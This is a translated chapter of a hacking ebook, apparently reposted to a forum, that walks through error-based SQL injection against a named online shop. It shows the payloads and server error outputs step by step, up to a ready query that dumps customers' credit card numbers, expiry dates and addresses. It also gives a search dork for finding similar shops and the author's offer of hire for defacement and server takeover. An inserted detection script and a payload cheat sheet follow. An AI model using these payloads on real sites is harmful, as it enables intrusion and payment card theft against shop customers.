Hacker Professional Ebook part 235 doc


Now let's get the shop's user_name with the following query:

%2bconvert(int,user_name()) sp_password

The full URL is:

http://www.mcmessentials.com.au/shop ) sp_password

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'braunshop' to a column of data type int

/shop/include/viewproduct.asp, line 3

'braunshop' is the shop's user_name value.

*Note

2. The user_name() field identifies the current user. If it is dbo, we can hack straight into the whole server without needing admin rights; if not, there are intermediate steps to take it over. OK, we stop at getting cc from the shop and won't discuss taking over the whole server. The main purpose is for everyone to learn and exchange experience, not to draw anyone into seriously harming anybody else, so I only post up to the part about getting cc. If anyone has a grudge against someone and wants to deface, get passwords, get root, or take a server or host, contact me.

OK, now we will retrieve the tables one by one on the column label.

Get the first table with the following query:

Code:

%2bconvert(int,(select%20top%201%20table_name%20from%20information_sch ema.tables)) sp_password

The full URL is:

http://www.mcmessentials.com.au/shop ) sp_password

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'categorieslist' to a column of data type int

/shop/include/viewproduct.asp, line 3

OK, table 1 is 'categorieslist'. To get the second table we have to use where table_name not in('table1').

The query looks like this:

Code:

%2bconvert(int,(select%20top%201%20table_name%20from%20information_sch ema.tables%20where%20table_name%20not%

20in('categorieslist'))) sp_password

http://www.mcmessentials.com.au/shop ) sp_password

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'allorders' to a column of data type int

/shop/include/viewproduct.asp, line 3

Table 2 is 'allorders'.

To get the third table and the remaining ones, keep doing the same as for the second table.

Code:

%2bconvert(int,(select%20top%201%20table_name%20from%20information_sch ema.tables%20where%20table_name%20not%

20in('categorieslist','allorders'))) sp_password

These are all the shop's tables just retrieved:

Code:

'categorieslist','allorders','categories','categorymembers','deliveryZones','dtproperties','essorders','fullorder','keywords','optiongroupmembers','optiongroups','optiongroupslist','optionmembers','options','optionslist','orderoptions','orderoptions-options','orderproducts','orderproducts-products','orders','products','products-categories','products-options','searchresults','sysconstraints','syssegments'

OK, once you have all the tables, you start getting the tables' columns. There are two ways to get columns: 1. get all the columns, with no particular goal or to check the whole database; 2. first determine which table you need columns from, then get them. I only take columns from the table that holds cc: 'allorders' or 'orders'.

OK, let's get them.

The query to get the first column is:

1. Get columns across all tables, without caring which table they belong to, until there are none left. The query has this form:

Code:

%2bconvert(int,(select top 1 column_name from information_schema.columns)) sp_password

Once you have column1, use where column_name not in('column1'), OK?

2. Get columns from a table determined in advance.

The query is as follows; for example, I get the columns of the table orders:

Code:

%2bconvert(int,(select top 1 column_name from information_schema.columns where table_name ='orders')) sp_password

http://www.mcmessentials.com.au/shop ) sp_password

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'orderid' to a column of data type int

/shop/include/viewproduct.asp, line 3

The first column is 'orderid'.

To get the second column, add and column_name not in('orderid'):

Code:

%2bconvert(int,(select top 1 column_name from information_schema.columns where table_name ='orders' and column_name not in('orderid'))) sp_password

http://www.mcmessentials.com.au/shop ) sp_password

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'created' to a column of data type int

/shop/include/viewproduct.asp, line 3

And so on, until all the columns of the table 'orders' have been retrieved.

Once you have all the columns of the table 'orders', only the last and most attractive step remains: getting cc. Write a single query to get cc based on all the columns you obtained. Each shop has different database fields, but most shops found with the search allinurl: "/shop?viewproduct.asp" take only one form of query, because I have tried them all, hehe, and every one works.

So you don't have to tire yourselves arranging them into a query, I'll just give it to you to use.

Get the first cc:

Code:

%2bconvert(int,(select%20top%201%20cardtype%2b'%20Name:'%2bcardname% 2b'%20addr:%20'%2baddress%2b'%20suburb:%20'%

2bsuburb%2b'%20state:%20'%2bstate%2b'%20zip:%20'%2bpostcode%2b'%20cou ntry:%20'%2bcountry%2b'%20phone:%20'%2bphone%

2b'%20email:%20'%2bemail%2b'%20cardnumber:%20'%2bcardnumber%2b'%20e xpireymonth:%20'%2bexpirymonth%2b'%20year:%20'%

2bexpiryyear%20from%20orders)) sp_password

To get the second cc, add after from orders: where cardnumber not in('first card number')

And so on, until all the credit cards on it have been retrieved.

A shop like the one above is only for you to practise on and gain more experience, because this is only for learning and is not meant to harm anyone.

fantomas311(VNISS)
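
Seen from the defender's side, the requests in this walkthrough leave a recognisable trail in the web server log: a URL-encoded `convert(int, ...)` wrapper, reads of `information_schema`, a growing `not in(...)` list, the trailing `sp_password` comment, and a run of 500 responses. The detection sketch below is an added example, not part of the original post; the log layout, the path and the parameter name `id` are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed log lines: "client method path query status". The path and the
# parameter name "id" are assumptions; the IPs are documentation addresses.
SAMPLE_LOG = """\
198.51.100.4 GET /app/item.asp id=12 200
203.0.113.7 GET /app/item.asp id=12%2bconvert(int,user_name())--sp_password 500
203.0.113.7 GET /app/item.asp id=12%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password 500
203.0.113.7 GET /app/item.asp id=12%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in('t1')))--sp_password 500
198.51.100.9 GET /app/search.asp q=how+to+convert+int+to+text 200
"""

# Each signal is matched against the URL-decoded query string.
SIGNALS = {
    "cast_leak": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "schema_read": re.compile(r"information_schema\s*\.\s*(tables|columns)", re.I),
    "trace_evasion": re.compile(r"--\s*sp_password", re.I),
    "not_in_walk": re.compile(r"not\s+in\s*\(", re.I),
}

def scan(log_text):
    """Return {client: {"hits": set of signal names, "errors": count of 5xx}}."""
    report = defaultdict(lambda: {"hits": set(), "errors": 0})
    for line in log_text.splitlines():
        parts = line.split(" ", 4)
        if len(parts) != 5:
            continue  # skip malformed lines instead of raising
        client, _method, _path, query, status = parts
        decoded = unquote_plus(query)  # %2b -> '+', %20 -> ' '
        hits = {name for name, rx in SIGNALS.items() if rx.search(decoded)}
        if hits:
            report[client]["hits"] |= hits
            report[client]["errors"] += int(status.startswith("5"))
    return dict(report)

def suspects(log_text, min_signals=2):
    """Clients showing several distinct signals; one keyword alone is not enough."""
    return sorted(c for c, r in scan(log_text).items() if len(r["hits"]) >= min_signals)

if __name__ == "__main__":
    for client in suspects(SAMPLE_LOG):
        print(client, scan(SAMPLE_LOG)[client])
```

Detection only shortens the response time; the fix is a parameterized query in the page that builds the statement, plus generic error pages so that conversion errors never reach the client.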

SQL Injection roundup (part 9)

A. Extracting information about the SQL server

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

1. Extracting information about MS SQL Server

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

' Information about the MS SQL version

and 1=@@version sp_password

'Information about servername

and 1=@@servername sp_password

'Information about SERVICENAME

and 1=@@SERVICENAME sp_password

'Information about UID

and 1=system_user sp_password

'Information about PWD

?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

2. Extracting information about the database

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

'Information about the database name

and 1=db_name() sp_password

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

3. Extracting information about tables

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

'Extracting information about a table

having 1=1 sp_password

'Extracting information about the tables

group by QUESTIONS.QUEST_ID having 1=1 sp_password

'Extracting information about a table

Posted: 04/07/2014, 12:20